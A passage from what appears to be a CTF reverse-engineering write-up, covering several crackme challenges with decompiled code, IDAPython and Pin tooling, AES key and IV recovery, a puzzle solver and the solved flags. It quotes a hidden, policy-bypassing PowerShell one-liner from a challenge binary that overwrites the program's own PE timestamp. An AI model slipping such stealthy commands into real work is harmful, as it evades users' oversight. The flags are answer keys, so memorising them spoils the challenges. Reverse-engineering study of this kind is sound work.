LPVOID __fastcall sub_140003A50(DWORD *p_count)
{
hResInfo = FindResourceA(0, (LPCSTR)0xFE, (LPCSTR)0xFF);
hResData = LoadResource(0, hResInfo);
*p_count = SizeofResource(0, hResInfo);
return LockResource(hResData);
}

Uses the resource in file. The sub_140003830:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
__int64 __fastcall sub_140003830(_DWORD *buf)
{
lp = (unsigned __int16 *)sub_140003700(buf, 0);
if ( !lp )
return 0;
if ( IsBadReadPtr_w(lp, 0xF8u) )
return 0;
return lp[12];
}

__int64 __fastcall sub_140003700(_DWORD *buf, unsigned __int64 n64)
{
if ( !buf )
return 0;
if ( n64 )
{
if ( !sub_140003580((unsigned __int64)buf, n64, (unsigned __int64)buf, 0x40u) )
return 0;
}
else if ( IsBadReadPtr_w(buf, 0x40u) )
{
return 0;
}
if ( *(_WORD *)buf != 0x5A4D ) // MZ
return 0;
n1024 = buf[15];
if ( n1024 > 1024 )
return 0;
buf_1 = (_DWORD *)((char *)buf + n1024);
if ( n64 )
{
if ( !sub_140003580((unsigned __int64)buf, n64, (unsigned __int64)buf_1, 0xF8u) )
return 0;
}
else if ( IsBadReadPtr_w(buf_1, 0xF8u) )
{
return 0;
}
if ( *buf_1 == 0x4550 ) // PE
return (__int64)buf + n1024;
else
return 0;
}

So this resource after decrypt is an exe or shellcode. However, there’s no need to analyze the shellcode. The file in the traffic are also crypted with AES-256-CBC, as the first 4 bytes are key, AES key = SHA256(KEY), iv = 0F0E0D0C0B0A09080706050403020100.

CMO{Dumb357_P3r50n_1n_7h3_M1lky_W4y_!!!}

A Matter of Time

The program‘s code is highly obfuscated, but the basic structures are not be changed. Debug to trace and find the chain.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
0x140009188 Start
0x140017A8E call 0x140009854 _security_init_cookie()
0x140009195 jmp 0x1400217E4 __scrt_common_main_seh()
0x1400217F8 call 0x140008CE8 __scrt_initialize_crt()
0x14000904F jp 0x14002184F __scrt_common_main_seh()+0x43
0x140021867 call _initterm_e
0x140009080 jnb 0x1400218DA __scrt_common_main_seh()+0x6e
0x1400218E8 call _initterm
; → The 'First_' array contains:
; .rdata:0x14000B4C0 dq offset 0x140008FF0
; .rdata:0x14000B4C8 dq offset 0x140001000
; 0x140008FF0:
; sub rsp, 0x28
; call addr1 → lea rcx, 0x1400097F4: TopLevelExceptionFilter; jmp SetUnhandledExceptionFilter → terminate()
; call addr2 → xor eax, eax
; mov ecx,eax
; add rsp, 0x28
; jmp _set_new_mode
; 0x140001000: load 96 bytes cipher → decrypt to readable hex 4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7
0x1400090FC jns 0x140021A28 __scrt_common_main_seh()+0xEA
0x140021A45 call 0x140004290 main
0x1400042CE ja 0x14001CFD3 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
0x1400044AD ja 0x14001D316 ; load cipher and decrypt
0x14001D39F call 0x1400073A8 print()
0x14001D3A4 call getchar()
0x14001D3EB cmp eax, 698FBB00h ; cmp a value with 698FBB00h

At 0x14001D3EB, the value of eax is a value very similar to the time stamp, but it only updates once every several minutes. Debug shows that what the program accessed is a file’s time, as C:\Windows\System32\winevt\Logs\System.evtx. Continue:

1
2
3
4
0x14001D3F0 jmp 0x140004554
0x140004554 jbe 0x14001D772 ; < 698FBB00h ; Extra output: "Ah yes, you either snuck in to review things before the CTF, or you're just playing games with the dates. Very recreational."
0x14000455A jbe 0x14001D3F7
0x140004560 ja 0x14001D41D ; > 698FBB00h

Note that all printable strings in program are loaded from xmmwords to xmmregs, and the decrypt is xor single byte key + index, try to find and decrypt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
import idautils
import idaapi
import idc
import string

def is_printable(s):
return len(s) > 0 and all(c in string.printable.encode() for c in s)

def decrypt_with_key(data, key):
plain = bytearray()
for i, b in enumerate(data):
k = (key + i) & 0xFF
plain.append(b ^ k)
return bytes(plain)

def get_segment_by_name(name):
for seg_ea in idautils.Segments():
seg = idaapi.getseg(seg_ea)
if seg and idaapi.get_segm_name(seg) == name:
return seg_ea
return None

def get_rbp_offset(op):
if op.type != idaapi.o_displ:
return None
if op.reg != idaapi.str2reg("rbp"):
return None
return op.addr

def sign_extend(value, bits=64):
if value & (1 << (bits - 1)):
value -= 1 << bits
return value

def extract_data_from_insn(ea):
insn = idaapi.insn_t()
if not idaapi.decode_insn(insn, ea):
return None, None

dst = insn.ops[0]
src = insn.ops[1]
if (insn.itype == idaapi.NN_movdqa and
dst.type == idaapi.o_displ and
dst.reg == idaapi.str2reg("rbp") and
src.type == idaapi.o_reg):
offset = sign_extend(dst.addr)
return offset, b'\x00' * 16
if (insn.itype == idaapi.NN_mov and
(dst.type == idaapi.o_displ and dst.reg == idaapi.str2reg("rbp")) and
src.type == idaapi.o_imm):
offset = sign_extend(dst.addr)
imm = src.value
dtyp = src.dtype
if dtyp == idaapi.dt_byte:
data = bytes([imm & 0xFF])
elif dtyp == idaapi.dt_word:
data = (imm & 0xFFFF).to_bytes(2, 'little')
elif dtyp == idaapi.dt_dword:
data = (imm & 0xFFFFFFFF).to_bytes(4, 'little')
elif dtyp == idaapi.dt_qword:
data = (imm & 0xFFFFFFFFFFFFFFFF).to_bytes(8, 'little')
else:
return None, None
return offset, data

return None, None

def main():
seg_start = get_segment_by_name('.ch')
if seg_start is None:
print("[-] Segment '.ch' not found!")
return

seg = idaapi.getseg(seg_start)
seg_end = seg.end_ea
ea = seg_start

while ea < seg_end:
if not idaapi.is_code(idaapi.get_flags(ea)):
ea = idaapi.next_head(ea, seg_end)
continue
insn = idaapi.insn_t()
if not idaapi.decode_insn(insn, ea):
ea = idaapi.next_head(ea, seg_end)
continue

if not (insn.itype == idaapi.NN_movdqa and
insn.ops[0].type == idaapi.o_reg and
insn.ops[1].type == idaapi.o_mem):
ea = idaapi.next_head(ea, seg_end)
continue
block_data = {}
current_ea = ea
last_xmm_data = {}

while current_ea < seg_end:
insn = idaapi.insn_t()
if not idaapi.decode_insn(insn, current_ea):
break
if (insn.itype == idaapi.NN_movdqa and
insn.ops[0].type == idaapi.o_reg and
insn.ops[1].type == idaapi.o_mem):
reg_idx = insn.ops[0].reg
mem_addr = insn.ops[1].addr
data = idaapi.get_bytes(mem_addr, 16)
if data and len(data) == 16:
last_xmm_data[reg_idx] = data
current_ea = idaapi.next_head(current_ea, seg_end)
continue
if (insn.itype == idaapi.NN_movdqa and
insn.ops[0].type == idaapi.o_displ and
insn.ops[0].reg == idaapi.str2reg("rbp") and
insn.ops[1].type == idaapi.o_reg):
offset = sign_extend(insn.ops[0].addr)
reg_idx = insn.ops[1].reg
if reg_idx in last_xmm_data:
block_data[offset] = last_xmm_data[reg_idx]
current_ea = idaapi.next_head(current_ea, seg_end)
continue
offset, data = extract_data_from_insn(current_ea)
if offset is not None and data is not None:
block_data[offset] = data
current_ea = idaapi.next_head(current_ea, seg_end)
continue
break
if block_data:
offsets = sorted(block_data.keys())
min_off = offsets[0]
full_data = bytearray()
expected_off = min_off
for off in offsets:
gap = off - expected_off
if gap > 0:
full_data.extend(b'\x00' * gap)
full_data.extend(block_data[off])
expected_off = off + len(block_data[off])
print(f"\n[?] Block at {ea:#x}, offsets: {offsets[:5]}{'...' if len(offsets)>5 else ''}")
solutions = []
for key in range(256):
plain = decrypt_with_key(full_data, key)
if is_printable(plain):
solutions.append((key, plain))
if solutions:
print(f"[+] Found {len(solutions)} solution(s):")
newline = '\n'
for key, plain in solutions:
decoded = plain.decode('ascii', errors='replace')
output = repr(decoded) if len(decoded) > 60 or newline in decoded else decoded
print(f" Key=0x{key:02X}: {output}")
else:
print("[-] No printable decryption.")
ea = current_ea if block_data else idaapi.next_head(ea, seg_end)

print("\n[+] Done.")

if __name__ == '__main__':
main()

The strings are:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
0x14001B3A7: 
powershell -executionpolicy bypass -noninteractive -nologo -NoProfile -WindowStyle Hidden -Command "Start-Sleep 1; $p='

0x14001B507:
'; $b=[IO.File]::ReadAllBytes($p);$e=[BitConverter]::ToInt32($b,0x3C);$z=[BitConverter]::GetBytes(0);$z.CopyTo($

0x14001B610:
b,$e+8);[IO.File]::WriteAllBytes($p,$b)"

0x14001CF2D:
===============================================================
> Welcome to Flar-... whoops I meant Crackmes.one Reverse Engineering CTF 2026!
> You must only attempt this challenge while the CTF is running.
> Therefore you need to be quick, 'Tempus Fugit' in the blink of an eye.
> Now listen carefully...
> The wandering time shall not bend,
> Seize it once, or it's gone to the end.
> Good luck, fellow traveller. Please save us. ~>-->-->~


*Journal entry from January 19, 2038 by [@heapsoverflow]
===============================================================

Press ENTER if you read...

0x14001D441:
Time's up. Every old system switched to 64-bit but at what cost... You can still try though.

0x14001D554:
This is the last day, my friend. Please hurry...

0x14001D629:
Still struggling, soldier? You've got plenty of time.

0x14001D6DA:
Ah yes, you either snuck in to review things before the CTF, or you're just playing games with the dates. Very recreational.

0x14001DB61:
Wrong timing.

0x14001DBFD:
Wow... Thank you for the effort! *Can you also stop Sam Altman?* Here's the flag:

0x14001F415:
4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7

From these strings we can see the right case is at 0x14001DBFD:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
.ch:00007FF60465DB31 loc_7FF60465DB31:                       ; CODE XREF: .text:00007FF604644885↑j
.ch:00007FF60465DB31 lea r8, [rbp+420h]
.ch:00007FF60465DB38 lea rdx, [rbp+438h]
.ch:00007FF60465DB3F lea rcx, [rbp+408h]
.ch:00007FF60465DB46 call loc_7FF60464326C
.ch:00007FF60465DB4B mov rax, [rbp+408h]
.ch:00007FF60465DB52 cmp byte ptr [rax], 43h ; 'C'
.ch:00007FF60465DB55 js loc_7FF6046448A3
.ch:00007FF60465DB5B jns loc_7FF6046448A3

.text:00007FF6046448A3 loc_7FF6046448A3: ; CODE XREF: .ch:00007FF60465DB27↓j
.text:00007FF6046448A3 ; .ch:00007FF60465DB55↓j ...
.text:00007FF6046448A3 jz short case_flag
.text:00007FF6046448A5 cmp byte ptr [rax+1], 4Dh ; 'M'
.text:00007FF6046448A9 jz short case_flag
.text:00007FF6046448AB nop
.text:00007FF6046448AC nop
.text:00007FF6046448AD nop
.text:00007FF6046448AE nop
.text:00007FF6046448AF jz Wrong_timing_1
.text:00007FF6046448B5 jnz Wrong_timing_2

Note that at this address, the program is comparing [rax] with “CM” (the flag header), so at this time the flag is already be decrypted. As [rax] is a 48 byte array, and the suspicious 96 character hex, the 4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7 is the cipher without doubt. Add hardware breakpoint to this cipher, and:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
.ch:00007FF60466572A ; __int64 __fastcall __far loc_7FF60466572A(void *)
.ch:00007FF60466572A loc_7FF60466572A: ; CODE XREF: .text:00007FF604647BCA↑j
.ch:00007FF60466572A mov [rsp+20h], rbx
.ch:00007FF60466572F push rbp
.ch:00007FF604665730 push rsi
.ch:00007FF604665731 push rdi
.ch:00007FF604665732 sub rsp, 30h
.ch:00007FF604665736 mov rsi, rcx
.ch:00007FF604665739 mov rdi, r8
.ch:00007FF60466573C mov rcx, 7FFFFFFFFFFFFFFFh
.ch:00007FF604665746 mov rbp, rdx
.ch:00007FF604665749 cmp r8, rcx
.ch:00007FF60466574C jle loc_7FF604647BE6
.ch:00007FF604665752 jg loc_7FF604647BE6
.ch:00007FF604665758 sub eax, 0FE46AEA0h
.ch:00007FF60466575D
.ch:00007FF60466575D loc_7FF60466575D: ; CODE XREF: .text:00007FF604647BF2↑j
.ch:00007FF60466575D mov rcx, rsi ; void *
.ch:00007FF604665760 mov [rsi+10h], r8
.ch:00007FF604665764 mov qword ptr [rsi+18h], 0Fh
.ch:00007FF60466576C call memcpy
.ch:00007FF604665771 mov byte ptr [rdi+rsi], 0
.ch:00007FF604665775 jl loc_7FF604647C06
.ch:00007FF60466577B jge loc_7FF604647C06
.ch:00007FF604665781
.ch:00007FF604665781 loc_7FF604665781: ; CODE XREF: .text:loc_7FF604647C0B↑j
.ch:00007FF604665781 mov rax, rdi
.ch:00007FF604665784 or rax, 0Fh
.ch:00007FF604665788 cmp rax, rcx
.ch:00007FF60466578B js loc_7FF604647C12
.ch:00007FF604665791 jns loc_7FF604647C12
.ch:00007FF604665797
.ch:00007FF604665797 loc_7FF604665797: ; CODE XREF: .text:00007FF604647C14↑j
.ch:00007FF604665797 mov edx, 16h
.ch:00007FF60466579C mov rcx, rax
.ch:00007FF60466579F cmp rax, rdx
.ch:00007FF6046657A2 cmovb rcx, rdx
.ch:00007FF6046657A6 jmp loc_7FF604647C23

At this place the 96 char hex is converted to 48 bytes. And add bp again to the 48 byte:

1
2
3
4
5
6
7
.ch:00007FF60466347E loc_7FF60466347E:                       ; CODE XREF: .text:00007FF604643320↑j
.ch:00007FF60466347E movups xmm0, xmmword ptr [rbx]
.ch:00007FF604663481 lea rdx, [rsp+40h]
.ch:00007FF604663486 mov rcx, rbx
.ch:00007FF604663489 call loc_7FF604641498
.ch:00007FF60466348E mov ecx, 10h
.ch:00007FF604663493 jmp loc_7FF60464332F

At this place the 48 bytes are read. Moreover, the [rsp+40h] is a string 000...<Username> (username is from 0x14001D850 call 0x1400033B4 and Padding is added at 0x14001D8A4 call 0x140003D98). This is just 16 bytes. And debug shows that the array used for comparison after decryption is the result of AES-128-CBC with iv = 000...<a value related to timestamp> decryption using this string as key. The iv is generated at:

1
2
3
4
5
6
7
.ch:00007FF60465D9AB loc_7FF60465D9AB:                       ; CODE XREF: .text:00007FF6046447D4↑j
.ch:00007FF60465D9AB call loc_7FF604643734
.ch:00007FF60465D9B0 xor eax, edi
.ch:00007FF60465D9B2 mov edx, eax
.ch:00007FF60465D9B4 lea rcx, [rbp+150h]
.ch:00007FF60465D9BB call loc_7FF604647034
.ch:00007FF60465D9C0 jmp loc_7FF6046447E3

The loc_7FF604643734 returned an int and this int ^ timestamp is the iv’s value. And what this loc returns is the TimeDateStamp of the PE header of this program. Note that above has a powershell script: powershell -executionpolicy bypass -noninteractive -nologo -NoProfile -WindowStyle Hidden -Command "Start-Sleep 1; $p=''; $b=[IO.File]::ReadAllBytes($p);$e=[BitConverter]::ToInt32($b,0x3C);$z=[BitConverter]::GetBytes(0);$z.CopyTo($b,$e+8);[IO.File]::WriteAllBytes($p,$b)". This will set the TimeDateStamp to 0. This maybe means the program has only one time to try to run. Anyway, we can find the username in the compilation information of the program:

1
2
3
4
5
6
7
.rdata:00007FF60464D590 asc_7FF60464D590 db 'RSDS'              ; DATA XREF: .rdata:00007FF60464C5F4↑o
.rdata:00007FF60464D590 ; CV signature
.rdata:00007FF60464D594 GUID <0> ; GUID
.rdata:00007FF60464D5A4 dd 0 ; Age
.rdata:00007FF60464D5A8 text "UTF-8", 'C:\Users\nicetryboogeyman\cmo\x64\Release\cmo.pdb',0,0 ; PdbFileName
.rdata:00007FF60464D5DB text "UTF-8", 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.rdata:00007FF60464D5F7 text "UTF-8", 0,0,0

And try a value near 0x20000000 (this is the result range obtained by XORing the original TimeDateStamp of the program around February 17~18th) as iv to decrypt:

1
2
3
4
5
6
7
8
9
10
from Crypto.Cipher import AES

ct = bytes.fromhex("4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7")

key = b"nicetryboogeyman"
iv = b"0000000536870912"

pt = AES.new(key, AES.MODE_CBC, iv).decrypt(ct)
print(pt)
print(pt[:-3].decode("ascii")) # CMO{5h3_p5[uW8w^t0_l34rn_fr0M_n0T_t0_l1V3_1n}

This is very close to the flag. After fine-tuning, the correct IV can be obtained as 0000000537068053.

CMO{5h3_p4St_1s_t0_l34rn_fr0M_n0T_t0_l1V3_1n}

Hard

wallpaper

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from heapq import heappush, heappop

START_STATE = 0xB6FD071E9C8A3425
GOAL_STATE = 0xFEDCBA9876543210
MOVE_OFF = {0: -4, 1: -1, 2: +4, 3: +1}

def nibbles_u64(x: int): return tuple((x >> (4 * i)) & 0xF for i in range(16))

def u64_from_nibbles(nibs):
x = 0
for i, v in enumerate(nibs): x |= (v & 0xF) << (4 * i)
return x

def manhattan(state, goal_pos):
dist = 0
for idx, val in enumerate(state):
if val == 0: continue
gi = goal_pos[val]
r1, c1 = divmod(idx, 4)
r2, c2 = divmod(gi, 4)
dist += abs(r1 - r2) + abs(c1 - c2)
return dist

def legal_moves(blank_idx: int):
r, c = divmod(blank_idx, 4)
ds = []
if r > 0: ds.append(0)
if c > 0: ds.append(1)
if r < 3: ds.append(2)
if c < 3: ds.append(3)
return ds

def neighbors(state):
z = state.index(0)
for d in legal_moves(z):
nz = z + MOVE_OFF[d]
s2 = list(state)
s2[z], s2[nz] = s2[nz], s2[z]
yield tuple(s2), d

def astar(start, goal):
goal_pos = {v: i for i, v in enumerate(goal)}
h0 = manhattan(start, goal_pos)
pq = []
heappush(pq, (h0, 0, start))
came = {start: (None, None)}
gscore = {start: 0}
while pq:
f, g, s = heappop(pq)
if s == goal:
path = []
cur = s
while came[cur][0] is not None:
prev, d = came[cur]
path.append(d)
cur = prev
path.reverse()
return path
if g != gscore[s]: continue
for ns, d in neighbors(s):
ng = g + 1
if ns not in gscore or ng < gscore[ns]:
gscore[ns] = ng
came[ns] = (s, d)
heappush(pq, (ng + manhattan(ns, goal_pos), ng, ns))
return None

def apply_moves(state, digits):
st = list(state)
for ch in digits:
d = int(ch)
z = st.index(0)
if d not in legal_moves(z): return None
nz = z + MOVE_OFF[d]
st[z], st[nz] = st[nz], st[z]
return tuple(st)

def main():
start = nibbles_u64(START_STATE)
goal = nibbles_u64(GOAL_STATE)
path = astar(start, goal)
if path is None: raise SystemExit("No solution found")
s = "".join(str(d) for d in path)
end = apply_moves(start, s)
if end != goal: raise SystemExit("Internal check failed")
print(s)

if __name__ == "__main__":
main()

CMO{1012321103210033011233322110103321001}

Matryoshka v2

The program’s logic is very simple:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
int __fastcall main(int argc, const char **argv, const char **envp)
{
Stream = fopen("license.bin", "rb");
Stream_1 = Stream;
if ( !Stream )
goto LABEL_12;
fseek(Stream, 0, 2);
ElementCount = ftell(Stream_1);
rewind(Stream_1);
if ( (int)ElementCount <= 0 )
goto LABEL_11;
Size = (int)ElementCount + 1;
if ( __OFADD__(1, (_DWORD)ElementCount) )
Size = -1;
Buffer = malloc(Size);
Buffer_1 = Buffer;
if ( !Buffer )
{
LABEL_11:
fclose(Stream_1);
LABEL_12:
printf("Failed to read license.bin\n");
return 1;
}
Buffer[fread(Buffer, 1u, ElementCount, Stream_1)] = 0;
fclose(Stream_1);
hModule = LoadLibraryA("Doll.dll");
CheckPassword = GetProcAddress(hModule, "CheckPassword");
if ( CheckPassword )
{
if ( ((unsigned int (__fastcall *)(_BYTE *))CheckPassword)(Buffer_1) == 1 )
{
printf("Correct license\n");
return 0;
}
else
{
printf("Wrong license\n");
return 3;
}
}
else
{
printf("Could not load Doll.dll\n");
return 2;
}
}

For the dll, it has two resources, an 1MB shellcode and a 60+MB encrypted PE file. The shellcode is a whole code block filled with obfuscate. The dll:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
__int64 __fastcall CheckPassword(_OWORD *a1)
{
Src_1[0] = 0;
Src[0] = 0;
Size = 0;
Res = LoadRes((__int64)a1, Src_1, (DWORD *)&Size + 1, (const WCHAR *)L"MATRYOSHKA");
v4 = LoadRes(v3, Src, (DWORD *)&Size, (const WCHAR *)L"CHECK");
v5 = -1;
do
++v5;
while ( *((_BYTE *)a1 + v5) );
if ( !v5 && Res && v4 )
return 1;
Size_1 = (unsigned int)Size;
lpAddress = (__int64 (__fastcall *)(_OWORD *))VirtualAlloc(0, (unsigned int)(Size + 1), 0x3000u, 0x40u);
lpAddress_1 = lpAddress;
if ( !lpAddress )
{
p_Could_not_load_next_doll = L"VirtualAlloc failed for CHECK";
LABEL_9:
MessageBoxW(0, p_Could_not_load_next_doll, L"Error", 0x10u);
return 0;
}
memcpy(lpAddress, Src[0], Size_1);
v11 = *a1;
v12 = a1[1];
v24 = 0;
v23[0] = v11;
v23[1] = v12;
v13 = lpAddress_1(v23);
VirtualFree(lpAddress_1, 0, 0x8000u);
if ( !v13 )
return 0;
Size_2 = HIDWORD(Size);
lpAddress_2 = malloc(HIDWORD(Size));
memcpy(lpAddress_2, Src_1[0], (unsigned int)Size_2);
hModule = GetModuleHandleA("advapi32");
if ( !hModule )
hModule = LoadLibraryA("advapi32");
ProcAddress = GetProcAddress(hModule, "SystemFunction033");
if ( ProcAddress )
{
Src_1[1] = a1;
LODWORD(Src_1[0]) = 32;
Src[1] = lpAddress_2;
LODWORD(Src[0]) = Size_2;
((void (__fastcall *)(void **, void **))ProcAddress)(Src, Src_1);
}
PE = (__int64 *)LoadPE((int *)lpAddress_2, Size_2);
free(lpAddress_2);
if ( !PE )
{
p_Could_not_load_next_doll = L"Could not load next doll";
goto LABEL_9;
}
v19 = (__int64 (__fastcall *)(_OWORD *))FindNextCheck(PE);
if ( !v19 )
return 0;
return v19(a1 + 2);
}

So every doll.dll uses the shellcode to check the input, and use input to decrypt next dll.

1
2
3
4
5
movsx   eax, byte ptr [rax] ; * 32 (strlen?)
mov rcx, [rcx+rax] ; → 8 byte * 4
; in a qword check:
mov rax, <qword>
mov rax, <qword>

Because the amount of instructions is too big, try to use a pin trace script to record the change of rax and rcx in the shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
#include "pin.H"
#include <string>
#include <algorithm>
#include <cstdio>
#include <cctype>

KNOB<std::string> KnobOut(KNOB_MODE_WRITEONCE, "pintool", "o", "E:/CTF/temp/log.txt", "output log path");
KNOB<UINT64> KnobCallRva(KNOB_MODE_WRITEONCE, "pintool", "call_rva", "0x120B", "RVA of 'call rsi' in Doll.dll (default 0x120B)");

static ADDRINT g_callsite = 0;
static PIN_LOCK g_lock;
static FILE* g_fp = nullptr;

struct TData {
bool in_sc = false;
ADDRINT sc_lo = 0, sc_hi = 0;
ADDRINT last_va_base = 0;
ADDRINT last_va_size = 0;
ADDRINT last_rax = (ADDRINT)-1;
ADDRINT last_rcx = (ADDRINT)-1;
std::string buf;
};

static TLS_KEY g_tls;

static inline std::string ToLower(std::string s) {
std::transform(s.begin(), s.end(), s.begin(), [](unsigned char c){ return (char)std::tolower(c); });
return s;
}

static TData* GetTD(THREADID tid) {
return reinterpret_cast<TData*>(PIN_GetThreadData(g_tls, tid));
}

static VOID ThreadStart(THREADID tid, CONTEXT* /*ctxt*/, INT32 /*flags*/, VOID* /*v*/) {
TData* td = new TData();
td->buf.reserve(1 << 20);
PIN_SetThreadData(g_tls, td, tid);
}

static VOID ThreadFini(THREADID tid, const CONTEXT* /*ctxt*/, INT32 /*code*/, VOID* /*v*/) {
TData* td = GetTD(tid);
if (td) delete td;
}

static VOID FlushBuf(TData* td) {
if (!g_fp || td->buf.empty()) return;
PIN_GetLock(&g_lock, 0);
fwrite(td->buf.data(), 1, td->buf.size(), g_fp);
fflush(g_fp);
PIN_ReleaseLock(&g_lock);
td->buf.clear();
}

static VOID VA_Before(THREADID tid, ADDRINT /*lpAddress*/, ADDRINT dwSize, ADDRINT /*flAllocationType*/, ADDRINT /*flProtect*/) {
TData* td = GetTD(tid);
if (!td) return;
td->last_va_size = dwSize;
}

static VOID VA_After(THREADID tid, ADDRINT ret) {
TData* td = GetTD(tid);
if (!td) return;
td->last_va_base = ret;
}

static VOID EnterShellcode(THREADID tid, ADDRINT shell_entry, ADDRINT /*ip*/) {
TData* td = GetTD(tid);
if (!td || !g_fp) return;
td->in_sc = true;
td->last_rax = (ADDRINT)-1;
td->last_rcx = (ADDRINT)-1;
if (td->last_va_base == shell_entry && td->last_va_size > 0) {
td->sc_lo = td->last_va_base;
td->sc_hi = td->last_va_base + td->last_va_size;
} else {
td->sc_lo = shell_entry;
td->sc_hi = shell_entry + 0x200000;
}
PIN_GetLock(&g_lock, 0);
fprintf(g_fp, "===== enter shellcode entry=0x%llX range=[0x%llX,0x%llX) =====\n",
(unsigned long long)shell_entry,
(unsigned long long)td->sc_lo,
(unsigned long long)td->sc_hi);
fflush(g_fp);
PIN_ReleaseLock(&g_lock);
}

static VOID ExitShellcode(THREADID tid) {
TData* td = GetTD(tid);
if (!td || !g_fp) return;
td->in_sc = false;
PIN_GetLock(&g_lock, 0);
fprintf(g_fp, "===== exit shellcode =====\n");
fflush(g_fp);
PIN_ReleaseLock(&g_lock);
}

static ADDRINT ShouldLog(THREADID tid, ADDRINT ip) {
TData* td = GetTD(tid);
if (!td) return 0;
if (!td->in_sc) return 0;
if (ip < td->sc_lo || ip >= td->sc_hi) return 0;
return 1;
}

static VOID LogRegs(THREADID tid, ADDRINT rax, ADDRINT rcx) {
TData* td = GetTD(tid);
if (!td || !g_fp) return;
if (rax != td->last_rax) {
PIN_GetLock(&g_lock, 0);
fprintf(g_fp, "rax = 0x%llX\n", (unsigned long long)rax);
PIN_ReleaseLock(&g_lock);
td->last_rax = rax;
}
if (rcx != td->last_rcx) {
PIN_GetLock(&g_lock, 0);
fprintf(g_fp, "rcx = 0x%llX\n", (unsigned long long)rcx);
PIN_ReleaseLock(&g_lock);
td->last_rcx = rcx;
}
}


static VOID ImageLoad(IMG img, VOID* /*v*/) {
std::string name = ToLower(IMG_Name(img));
RTN va = RTN_FindByName(img, "VirtualAlloc");
if (RTN_Valid(va)) {
RTN_Open(va);
RTN_InsertCall(va, IPOINT_BEFORE, (AFUNPTR)VA_Before, IARG_THREAD_ID, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_FUNCARG_ENTRYPOINT_VALUE, 1, IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_FUNCARG_ENTRYPOINT_VALUE, 3, IARG_END);
RTN_InsertCall(va, IPOINT_AFTER, (AFUNPTR)VA_After, IARG_THREAD_ID, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);
RTN_Close(va);
}

if (name.find("doll.dll") != std::string::npos) {
ADDRINT base = IMG_LowAddress(img);
UINT64 rva = KnobCallRva.Value();
g_callsite = base + (ADDRINT)rva;

PIN_GetLock(&g_lock, 0);
if (g_fp) {
std::fprintf(g_fp, "[+] Doll.dll loaded: base=0x%llX, callsite=0x%llX (rva=0x%llX)\n", (unsigned long long)base, (unsigned long long)g_callsite, (unsigned long long)rva);
std::fflush(g_fp);
}
PIN_ReleaseLock(&g_lock);
}
}

static VOID Instruction(INS ins, VOID* /*v*/) {
if (g_callsite != 0 && INS_Address(ins) == g_callsite) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)EnterShellcode, IARG_THREAD_ID, IARG_REG_VALUE, REG_RSI, IARG_INST_PTR, IARG_END);
if (INS_IsValidForIpointAfter(ins)) {
INS_InsertCall(ins, IPOINT_AFTER, (AFUNPTR)ExitShellcode, IARG_THREAD_ID, IARG_END);
}
}
INS_InsertIfCall(ins, IPOINT_BEFORE, (AFUNPTR)ShouldLog, IARG_THREAD_ID, IARG_INST_PTR, IARG_END);
